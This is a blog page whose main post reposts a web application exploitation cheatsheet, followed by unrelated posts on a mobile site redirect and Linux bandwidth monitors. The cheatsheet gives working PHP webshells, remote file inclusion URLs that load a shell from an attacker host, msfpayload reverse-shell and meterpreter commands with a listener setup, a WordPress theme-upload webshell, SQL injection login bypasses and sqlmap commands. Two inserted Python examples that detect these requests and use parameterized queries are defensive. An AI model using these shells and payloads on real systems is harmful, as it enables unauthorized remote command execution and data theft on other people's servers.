Apr 19, 2012

Web Application exploitation - a cheatsheet By Tim Arneaud

If you want to get the full article, please go to the Source.


WebShell Backdoors
Minimal php command shells

file cmd.php: PHP script text =>

<?php system($_GET['cmd']) ?>

or

<?php system($_REQUEST['cmd']); ?>

Example usage via Remote File Include (RFI):

http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php

Null Bytes () may also assist in some cases:
http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php
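From the defender's side, the RFI requests shown above leave a distinctive trace in the web server's access log. The following is an added example, not part of the cheatsheet, that scans constructed Apache combined-format log lines for a remote URL in a query parameter, a null byte, or a cmd parameter aimed at a dropped shell; the IP addresses and paths are made up for the demo.

```python
# Added example (not from the cheatsheet): flag access-log requests that look like
# remote file inclusion attempts of the kind shown above (a URL in a parameter,
# a %00 null byte, or a cmd= parameter aimed at a dropped shell).
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined-log style (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [19/Apr/2012:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [19/Apr/2012:10:01:07 +0000] "GET /index.php?cmd=id&page=http://198.51.100.7/cmd.php HTTP/1.1" 200 77 "-" "curl/7.22"
10.0.0.9 - - [19/Apr/2012:10:01:09 +0000] "GET /index.php?page=http://198.51.100.7/cmd.php%00 HTTP/1.1" 200 77 "-" "curl/7.22"
10.0.0.5 - - [19/Apr/2012:10:01:20 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')
REMOTE_SCHEME = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

def classify_request(target):
    """Return the list of RFI-style indicators found in one request target."""
    indicators = []
    query = urlsplit(target).query
    for key, value in parse_qsl(query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl already decodes once; catch double encoding
        if REMOTE_SCHEME.match(decoded):
            indicators.append(f"remote URL in parameter {key!r}")
        if "\x00" in decoded or "%00" in value.lower():
            indicators.append(f"null byte in parameter {key!r}")
        if key.lower() == "cmd":
            indicators.append("cmd parameter present")
    return indicators

def scan_log(text):
    """Return (ip, target, indicators) for every suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format; skip rather than guess
        found = classify_request(m.group("target"))
        if found:
            hits.append((m.group("ip"), m.group("target"), found))
    return hits

if __name__ == "__main__":
    for ip, target, found in scan_log(SAMPLE_LOG):
        print(ip, target, "; ".join(found))
```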


Encoding windows reverse command shell as asp

msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp

Encoding meterpreter in asp

msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp

------

attacker msfconsole:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST <attacker-ip>

set LPORT <attacker-multi-handler-port>

exploit


Specific Web applications

Joomla

Joomla default database configuration filename

<web-app-path>/configuration.php

Scanning Joomla! for plugins and versions

/pentest/web/scanners/joomscan/joomscan.pl -u <target-and-joomla-path>

/pentest/enumeration/web/cms-explorer  -url <target-and-joomla-path> -type joomla


WordPress

WordPress default database configuration filename

<web-app-path>

WordPress default login page

<web-app-path>/wp-login.php

WordPress plugins

<web-app-path>/wp-content/plugins

Scanning WordPress for plugins and versions

/pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path> -enumerate [u|p|v|t]

/pentest/enumeration/web/cms-explorer -url <target-and-wordpress-path> -type wordpress

Newer WP: "Themes" can be uploaded as zip files by WP administrators:

mkdir wpx

vi wpx/cmd.php

cat wpx/cmd.php

<?php system($_GET['cmd']) ?>

zip -r wpx.zip wpx

upload wpx.zip via web interface as an installed theme

Command execution access is via: 

<web-app-path>/wp-content/plugins/wpx/cmd.php?cmd=<command(s)> 

Older WP: Webshells can be added by editing existing files/themes via the web interface, or by enabling file upload and permitting the needed file extension (e.g. .php)


Cacti

Cacti default database configuration filename

<web-app-path>/include/config.php

DeV!L`z ClanPortal

DeV!L`z ClanPortal default database configuration filename

<web-app-path>/inc/mysql.php

Drupal

Drupal default database configuration filename

<web-app-path>/sites/default/settings.php

Scanning Drupal for plugins and versions

/pentest/enumeration/web/cms-explorer -url <target-and-drupal-path> -type drupal

Timeclock

Timeclock default database configuration filename

<web-app-path>/db.php
 
SQL Terminators/Comments
MSSQL and MySQL:

<sql injected command>;--

MySQL:

<sql injected command>;#


Login Pages Basic SQL injection 

MS IIS

' OR '1=1';--


MySQL

'OR 1=1--
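Why the login strings above work, and what stops them, is easiest to see side by side. The following is an added example, not from the cheatsheet: an in-memory SQLite users table (constructed demo data) queried once with string concatenation and once with bound parameters, using the MySQL-style payload above (SQLite shares the -- comment syntax).

```python
# Added example (not from the cheatsheet): the two login checks below run against an
# in-memory SQLite table so the effect of the 'OR 1=1-- payload above can be observed.
# check_login_unsafe concatenates input into SQL; check_login_safe binds parameters.
import sqlite3

def make_db():
    """Constructed users table with one account (demo data only)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    return con

def check_login_unsafe(con, username, password):
    """String-built query: the payload closes the quote and comments out the rest."""
    sql = ("SELECT COUNT(*) FROM users WHERE username='" + username +
           "' AND password='" + password + "'")
    return con.execute(sql).fetchone()[0] > 0

def check_login_safe(con, username, password):
    """Parameterised query: the payload is compared as a literal username string."""
    sql = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone()[0] > 0

PAYLOAD = "'OR 1=1--"   # MySQL-style login bypass string from the cheatsheet

if __name__ == "__main__":
    con = make_db()
    print("unsafe, payload:  ", check_login_unsafe(con, PAYLOAD, "x"))          # True: bypassed
    print("safe, payload:    ", check_login_safe(con, PAYLOAD, "x"))            # False
    print("safe, real creds: ", check_login_safe(con, "alice", "correct-horse"))  # True
```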


SQLMap commands

cd /pentest/database/sqlmap

Retrieve the SQL banner, current database and current user; test whether the user is the DB administrator

./sqlmap.py -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba



Source: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html

If you like my blog, Please Donate Me

Apr 18, 2012

My website in mobile version by Dudamobile

I tried to make my website easy to view on your mobile by using the Dudamobile service, so you can view my site in its mobile version at the URL below.

When you visit my site from your mobile, a script I added will redirect you to the mobile version.

URL: http://mobile.dudamobile.com/site/r00tsec_blogspot
Shorten URL: http://bit.ly/J9KOtu




Apr 17, 2012

Monitor your bandwidth from the Linux shell

If you want to see the full article, please go to the source.

Bmon

bmon is a bandwidth monitor intended for debugging and real-time monitoring, capable of retrieving statistics from various input modules. It provides several output methods, including a curses-based interface. A set of architecture-specific input modules provides the core with the list of interfaces and their counters.
The core stores these counters and provides rate estimation, including a history over the last 60 seconds, minutes, hours and days, to the output modules, which display them according to the configuration. When running, you can select the interface to monitor and press "g" to see an active graph like this one:
[screenshot: bmon interface graph]

speedometer

This is an interesting project that lets you display and measure the rate of data across a network connection, or of data being written to a file.
As you can see, although it is a command-line tool, it has vivid colours and other touches that make it quite user-friendly. It can monitor the current download/upload speeds of the network connections and can also be used to measure write speed to a filesystem.
[screenshot: speedometer output]
Some of its features are:
  • Change update intervals (default is 1 second).
  • Supports a few built-in colour depths (1, 16 (default), 88 and 256); higher numbers mean better-quality output.
  • Monitors network interfaces (upload & download) and your file system.
  • Can be set up to use plain text rather than graphs.

nload

nload is a console application which monitors network traffic and bandwidth usage in real time. It visualizes incoming and outgoing traffic using two graphs and provides additional information such as the total amount of transferred data and min/max network usage. This program uses the ncurses library, so you will be able to interact with the mouse in the terminal.
[screenshot: nload graphs]
Features of nload
  • Supports all Ethernet interfaces.
  • View the bandwidth with a real-time graph in the shell.
  • Ability to set the scale, the graph update interval and the unit of measure.
Source: http://linuxaria.com/article/monitor-your-bandwidth-from-the-linux-shell